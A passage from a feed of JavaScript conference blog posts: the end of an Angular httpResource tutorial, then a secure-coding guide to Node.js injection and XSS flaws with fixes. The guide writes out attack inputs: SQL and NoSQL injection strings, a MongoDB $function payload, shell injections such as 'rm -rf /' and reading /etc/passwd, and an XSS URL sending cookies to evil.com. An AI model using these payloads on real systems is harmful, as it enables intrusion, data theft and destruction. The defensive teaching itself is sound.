}

Resources and missing parameters

The tilesResource shown in the diagram discussed is simply delegated to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  const tilesMap = tilesMapResource.value();

  // undefined prevents the resource from beeing triggered
  const request = computed(() =>
    !tilesMap
      ? undefined
      : {
          tilesMap: tilesMap,
          style: style(),
        }
  );

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.

iJS Newsletter

Keep up with JavaScript’s latest news!

Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A calculated signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates a percentage for the portion already downloaded. Otherwise, it just returns the number of kilobytes already downloaded. There is no progress information before the download starts. In this case, only a hyphen is used.

To test this function, it makes sense to throttle the browser’s network connection in the developer console and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may eventually be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
Common Vulnerabilities in Node.js Web Applications https://javascript-conference.com/blog/node-js-security-vulnerabilities-sql-xss-prevention/ Wed, 23 Apr 2025 07:44:46 +0000 https://javascript-conference.com/?p=107761 As Node.js is widely used to develop scalable and efficient web applications, understanding its vulnerabilities is crucial. In this article, we will explore common security risks, such as SQL injections and XSS attacks, and offer practical strategies to prevent them. By applying these insights, you'll learn how to protect user data and build more secure and reliable applications.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Node.js Overview

Node.js is an open source cross platform server environment that enables server side JavaScript. It has been in existence for a few years now and has grown to be a favorite among developers when it comes to building scalable and efficient web applications. Node.js is built on Chrome’s V8 JavaScript engine, which provides better speed and performance.

The other important feature of Node.js is its non-blocking, event-driven architecture. This model has enabled Node.js to work well with many concurrent connections and, for this reason, has been applied in real-time applications including chat applications, online gaming, and live streaming. Its use of the familiar JavaScript language also enhances its adoption.

"Diagram illustrating the Node.js system architecture, showing the interaction between the V8 JavaScript engine, Node.js bindings, the Libuv library, event loop, and asynchronous I/O operations including worker threads for file system, network, and process tasks.

Node.js Architecture

The Node.js architecture is designed to optimize performance and efficiency. It employs an event-driven, non-blocking I/O model to efficiently handle many tasks at a time without being slowed down by I/O operations.

Here are the main components of Node.js architecture:

  • Event Loop: The event loop is the heart of Node.js. It’s in charge of coordinating asynchronous I/O operations and preventing the application from becoming unresponsive. Node.js performs an asynchronous operation, such as file read or network request, and registers a callback function; then it carries on executing other code. Once the operation is complete, the callback function is queued up in the event loop, which then calls it.
  • Non-blocking I/O: Node.js uses non-blocking I/O operations so that the application does not become unresponsive when performing time-consuming operations. Node.js does not block the thread and wait for the operation to finish; instead, it carries on executing other code. This makes Node.js able to perform many tasks simultaneously, which is very beneficial.
  • Modules and Packages: Node.js has a large number of modules and packages that can be loaded into an application quite easily. The Node Package Manager (NPM) is currently the largest repository of open source software libraries in the world and is a treasure trove of modules that can help make your application better. However, the use of third-party packages also implies certain risks; if there is a vulnerability in a package, it can be easily exploited by an attacker.

Why Security is Crucial for Node.js Applications

As the usage of Node.js keeps on increasing, so does the need for strong security measures. The security of Node.js applications is important for several reasons:

  • Protecting Sensitive Data: Web applications are likely to deal with sensitive data including personal information, financial information and login credentials. The security of this data has to be secured to prevent unauthorized access and data breaches.
  • Maintaining User Trust: Users expect that their data and activity on an application is secure. A security breach can jeopardize users’ trust and the reputation of the organization.
  • Compliance with Regulations: Many industries are strictly regulated in respect to data security and privacy. It is necessary to make sure that Node.js applications are compliant with such rules in order to avoid legal consequences and financial penalties.
  • Preventing Financial Loss: Security breaches are costly to organizations in terms of dollars and cents. These losses can be in the form of direct costs, such as fines and legal expenses, and indirect costs, including lost revenue and damage to the brand.
  • Mitigating Risks from Third-Party Packages: The use of third-party packages is common in Node.js applications, posing security risks. Flaws in these packages can be exploited by attackers to take over the application. It is crucial to update and scan these packages frequently to reduce these risks.

Common Vulnerabilities in Node.js Applications

Injection Attacks – SQL Injection

Overview: An SQL injection is a type of attack where an attacker can execute malicious SQL statements that control a web application’s database server. This is typically done by inserting or “injecting” malicious SQL code into a query.

Scenario 1: Consider a simple login form where a user inputs their username and password. The server-side code might look something like this:

const username = req.body.username;

const password = req.body.password;

const query = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

db.query(query, (err, result) => {

  if (err) throw err;

  // Process result

});

If an attacker inputs admin’ — as the username and leaves the password blank, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = ''

The — sequence comments out the rest of the query, allowing the attacker to bypass authentication.

Solution: To prevent SQL injection, use parameterized queries or prepared statements. This ensures that user input is treated as data, not executable code.

const username = req.body.username;

const password = req.body.password;

const query = 'SELECT * FROM users WHERE username = ? AND password = ?';

db.query(query, [username, password], (err, result) => {

  if (err) throw err;

  // Process result

});

Scenario 2: Consider a simple Express application that retrieves a user from a database:

const express = require('express');

const mysql = require('mysql');

const app = express();

// Database connection

const connection = mysql.createConnection({

  host: 'localhost',

  user: 'root',

  password: 'password',

  database: 'users_db'

});

app.get('/user', (req, res) => {

  const userId = req.query.id;

  

  // VULNERABLE CODE: Direct concatenation of user input

  const query = "SELECT * FROM users WHERE id = " + userId;

  

  connection.query(query, (err, results) => {

    if (err) throw err;

    res.json(results);

  });

});

app.listen(3000);

The Attack

An attacker can exploit this by making a request like:

GET /user?id=1 OR 1=1

The resulting query becomes:

SELECT * FROM users WHERE id = 1 OR 1=1

Since 1=1 is always true, this returns ALL users in the database, exposing sensitive information.

More dangerous attacks might include:

GET /user?id=1; DROP TABLE users; --

Which attemps to delete the entire user’s table.

Secure Solution

Here’s how to fix the vulnerability using parameterized queries:

app.get('/user', (req, res) => {

  const userId = req.query.id;

  

  // SECURE CODE: Using parameterized queries

  const query = "SELECT * FROM users WHERE id = ?";

  

  connection.query(query, [userId], (err, results) => {

    if (err) throw err;

    res.json(results);

  });

});

Best Practices to Prevent SQL Injection

  1. Use Parameterized Queries: Always use parameter placeholders (?) and pass values separately.
  2. ORM Libraries: Consider using ORM libraries like Sequelize or Prisma that handle parameterization automatically.
  3. Input Validation: Validate user input (type, format, length) before using it in queries.
  4. Principle of Least Privilege: Database users should have minimal permissions needed for the application.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

NoSQL Injection

Overview: NoSQL injection is similar to SQL injection but targets NoSQL databases like MongoDB. Attackers can manipulate queries to execute arbitrary commands.

Scenario 1: Consider a MongoDB query to find a user by username and password:

const username = req.body.username;

const password = req.body.password;

User.findOne({ username: username, password: password }, (err, user) => {

  if (err) throw err;

  // Process user

});

The Attack

If an attacker inputs { “$ne”: “” } as the password, the query becomes:

User.findOne({ username: 'admin', password: { "$ne": "" } }, (err, user) => {

  if (err) throw err;

  // Process user

});

This query returns the first user where the password is not empty, potentially bypassing authentication.

Solution: To prevent NoSQL injection, sanitize user inputs and use libraries like mongo-sanitize to remove any characters that could be used in an injection attack.

const sanitize = require('mongo-sanitize');

const username = sanitize(req.body.username);

const password = sanitize(req.body.password);

User.findOne({ username: username, password: password }, (err, user) => {

  if (err) throw err;

  // Process user

});

Scenario 2: Consider a Node.js application that allows users to search for products with filtering options:

app.post('/products/search', async (req, res) => {

  const { category, sortField } = req.body;

  

  // VULNERABLE CODE: Directly using user input in aggregation pipeline

  const pipeline = [

    { $match: { category: category } },

    { $sort: { [sortField]: 1 } }, // Dangerous!

    { $limit: 20 }

  ];

  

  try {

    const products = await productsCollection.aggregate(pipeline).toArray();

    res.json(products);

  } catch (err) {

    res.status(500).json({ error: err.message });

  }

});

The Attack

An attacker could send a malicious payload:

{

  "category": "electronics",

  "sortField": "$function: { body: function() { return  db.getSiblingDB('admin').auth('admin', 'password') } }"

}

This attempts to execute arbitrary JavaScript in the MongoDB server through the $function operator, potentially allowing database access control bypass or even server-side JavaScript execution.

Secure Solution

Here’s the fixed version:

app.post('/products/search', async (req, res) => {

  const { category, sortField } = req.body;  

  // Validate category

  if (typeof category !== 'string') {

    return res.status(400).json({ error: "Invalid category format" });

  }  

  // Validate sort field against allowlist

  const allowedSortFields = ['name', 'price', 'rating', 'date_added'];

  if (!allowedSortFields.includes(sortField)) {

    return res.status(400).json({ error: "Invalid sort field" });

  }  

  // SECURE CODE: Using validated input

  const pipeline = [

    { $match: { category: category } },

    { $sort: { [sortField]: 1 } },

    { $limit: 20 }

  ]; try {

    const products = await productsCollection.aggregate(pipeline).toArray();

    res.json(products);

  } catch (err) {

    res.status(500).json({ error: "An error occurred" });

  }

});

Key Takeaways:

  1. Validates the data type of the category parameter.
  2. Uses an allowlist approach for sortField, restricting possible values.
  3. Avoids exposing detailed error information to potential attackers.

Command Injection

Overview: Command injection occurs when an attacker can execute arbitrary commands on the host operating system via a vulnerable application. This typically happens when user input is passed directly to a system shell.

Example: Consider a Node.js application that uses the exec function to list files in a directory:

const { exec } = require('child_process');

const dir = req.body.dir;

exec(`ls ${dir}`, (err, stdout, stderr) => {

  if (err) throw err;

  // Process stdout

});

If an attacker inputs ; rm -rf /, the command becomes:

ls ; rm -rf /

This command lists the directory contents and then deletes the root directory, causing significant damage.

Solution: To prevent command injection, avoid using exec with unsanitized user input. Use safer alternatives like execFile or spawn, which do not invoke a shell.

const { execFile } = require('child_process');

const dir = req.body.dir;

execFile('ls', [dir], (err, stdout, stderr) => {

  if (err) throw err;

  // Process stdout

});

Scenario 2: Consider a Node.js application that allows users to ping a host to check connectivity:

const express = require('express');

const { exec } = require('child_process');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {

  const hostInput = req.query.host;

  

  // VULNERABLE CODE: Direct concatenation of user input into command

  const command = 'ping -c 4 ' + hostInput;

  

  exec(command, (error, stdout, stderr) => {

    if (error) {

      res.status(500).send(`Error: ${stderr}`);

      return;

    }

    res.send(`<pre>${stdout}</pre>`);

  });

});

app.listen(3000);

The Attack

An attacker could exploit this vulnerability by providing a malicious input:

/ping?host=google.com; cat /etc/passwd

The resulting command becomes:

ping -c 4 google.com; cat /etc/passwd

This would execute the ping command followed by displaying the contents of the system’s password file, potentially exposing sensitive information.

/ping?host=;rm -rf /*

Which attempts to delete all files on the system (assuming adequate permissions).

Secure Solution

Here’s how to fix the vulnerability:

const express = require('express');

const { execFile } = require('child_process');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {

  const hostInput = req.query.host;

  

  // Input validation: Basic hostname format check

  if (!/^[a-zA-Z0-9][a-zA-Z0-9\.-]+$/.test(hostInput)) {

    return res.status(400).send('Invalid hostname format');

  }

  

  // SECURE CODE: Using execFile which doesn't invoke shell

  execFile('ping', ['-c', '4', hostInput], (error, stdout, stderr) => {

    if (error) {

      res.status(500).send('Error executing command');

      return;

    }

    res.send(`<pre>${stdout}</pre>`);

  });

});

app.listen(3000);

Best Practices to Prevent Command Injection

  1. Avoid shell execution: Use execFile or spawn instead of exec when possible, as they don’t invoke a shell.
  2. Input validation: Implement strict validation of user input using regex or other validation methods.
  3. Allowlists: Use allowlists to restrict inputs to known-good values.
  4. Use built-in APIs: When possible, use Node.js built-in modules instead of executing system commands.
  5. Principle of least privilege: Run your Node.js application with minimal required system permissions.

iJS Newsletter

Keep up with JavaScript’s latest news!

Cross-Site Scripting (XSS) Attacks

This is a kind of security vulnerability that is most often seen in web applications. It allows attackers to inject malicious scripts into web pages that other users view. These scripts can then be executed in the context of the victim’s browser, resulting in potential data theft, session hijacking and other malicious activities. An XSS vulnerability occurs when an application uses unvalidated input in creating a web page.

How XSS Occurs

XSS attacks happen when the attacker is able to inject malicious scripts into a web application and the scripts get executed in the victim’s browser, thus making the attacker perform actions on behalf of the user or even steal sensitive information.

How XSS Occurs in Node.js

XSS attacks can occur in Node.js applications when user input is not properly sanitized or encoded before being included in the HTML output. This can happen in various scenarios, such as displaying user comments, search results, or any other dynamic content.

Types of XSS Attacks

XSS vulnerabilities can be classified into three primary types:

  • Reflected XSS: The malicious script is reflected off a web server, such as in an error message or search result, and is immediately executed by the user’s browser.
  • Stored XSS: The malicious script is stored on the server, such as in a database, and is executed whenever the data is retrieved and displayed to users.
  • DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code, and the malicious script is executed as a result of modifying the DOM environment.

Scenario 1: Consider a Node.js application that displays user comments without proper sanitization:

const express = require('express');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {

  const comment = req.body.comment;

  res.send(`<div><p>User comment: ${comment}</p></div>`);

});

app.listen(3000, () => {

  console.log('Server is running on port 3000');

});

If an attacker submits a comment containing a malicious script, such as:

<script>alert('XSS');</script>

The application will render the comment as:

<div>

  <p>User comment: <script>alert('XSS');</script></p>

</div>

When another user views the comment, the script will execute, displaying an alert box with the message “XSS”.

Prevention Techniques

To prevent XSS attacks in Node.js applications, developers should implement the following techniques:

  • Input Validation: Ensure that all user inputs are validated to conform to expected formats. Reject any input that contains potentially malicious content.
  • Output Encoding: Encode user inputs before displaying them in the browser. This ensures that any special characters are treated as text rather than executable code.
onst express = require('express');

const app = express();

const escapeHtml = require('escape-html');

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {

  const comment = escapeHtml(req.body.comment);

  res.send(`<div><p>User comment: ${comment}</p></div>`);

});

app.listen(3000, () => {

  console.log('Server is running on port 3000');

});

Here, escapeHtml is a function that converts special characters to their HTML entity equivalents.

  • Content Security Policy (CSP): Implement a Content Security Policy to restrict the sources from which scripts can be loaded. This helps prevent the execution of malicious scripts.
  • HTTP-Only and Secure Cookies: Use HTTP-only and secure flags for cookies to prevent them from being accessed by malicious scripts.
res.cookie('session', sessionId, { httpOnly: true, secure: true });

Scenario 2: Reflected XSS in a Search Feature

Here’s a simple Express application with an XSS vulnerability:

const express = require('express');

const app = express();

app.get('/search', (req, res) => {

  const searchTerm = req.query.q;

  

  // VULNERABLE CODE: Directly embedding user input in HTML response

  res.send(`

    <h1>Search Results for: ${searchTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

app.listen(3000);

The Attack

An attacker could craft a malicious URL:

/search?q=<script>document.location='https://evil.com/stealinfo.php?cookie='+document.cookie</script>

When a victim visits this URL, the script executes in their browser, sending their cookies to the attacker’s server. This could lead to session hijacking and account takeover.

Secure Solutions

  1. Output Encoding
const express = require('express');

const app = express();

app.get('/search', (req, res) => {

  const searchTerm = req.query.q || ''; 

  // SECURE CODE: Encoding special characters

  const encodedTerm = searchTerm

    .replace(/&/g, '&amp;')

    .replace(/</g, '&lt;')

    .replace(/>/g, '&gt;')

    .replace(/"/g, '&quot;')

    .replace(/'/g, '&#039;');

  res.send(`

    <h1>Search Results for: ${encodedTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

2. Using Template Engines

const express = require('express');

const app = express();

app.set('view engine', 'ejs');

app.set('views', './views');

app.get('/search', (req, res) => {

  const searchTerm = req.query.q || '';

  

  // SECURE CODE: Using EJS template engine with automatic escaping

  res.render('search', { searchTerm });

});

3. Using Content Security Policy

const express = require('express');

const helmet = require('helmet');

const app = express();

// Add Content Security Policy headers

app.use(helmet.contentSecurityPolicy({

  directives: {

    defaultSrc: ["'self'"],

    scriptSrc: ["'self'"],

    styleSrc: ["'self'"],

  }

}));

app.get('/search', (req, res) => {

  // Even with encoding, adding CSP provides defense in depth

  const searchTerm = req.query.q || '';

  const encodedTerm = searchTerm

    .replace(/&/g, '&amp;')

    .replace(/</g, '&lt;')

    .replace(/>/g, '&gt;');

  

  res.send(`

    <h1>Search Results for: ${encodedTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

Best Practices to Prevent XSS

  • Context-appropriate encoding: Only display output encoded according to what it is to be used for HTML, JavaScript, CSS, or URL.
  • Use security libraries: When using HTML, it’s better to use DOMPurify, js-xss or sanitize-html.
  • Content Security Policy: CSP headers can also be used to restrict where scripts come from and when they can be executed.
  • Use modern frameworks: Some frameworks like React, Vue or Angular will encode output for you.
  • X-XSS-Protection: This header should be used to enable browser’s built in XSS filters.
  • HttpOnly cookies: Designate sensitive cookies as HttpOnly to prevent them from being accessed by JavaScript.

Following these practices will go a long way in ensuring that your Node.js applications are secure against XSS attacks, which are still very frequent in web applications.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

Conclusion

Security requires a comprehensive approach addressing all potential vulnerabilities. We discussed two of the most common threats that affect web applications:

SQL Injection

We explained how unsanitized user input in database queries can result in unauthorized data access or manipulation. To protect your applications:

  • Instead of string concatenation, use parameterized queries.
  • Secure ORMs are also available.
  • All user inputs should be validated before processing.
  • Apply the principle of least privilege for database access

Cross-Site Scripting (XSS)

We looked at how reflected XSS in a search feature can allow attackers to inject malicious scripts that are executed in users’ browsers. Essential defensive measures include:

  • Encoding of output where appropriate
  • Security libraries for HTML sanitization
  • Content Security Policy headers
  • Frameworks that offer protection against XSS
  • HttpOnly cookies for sensitive data.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>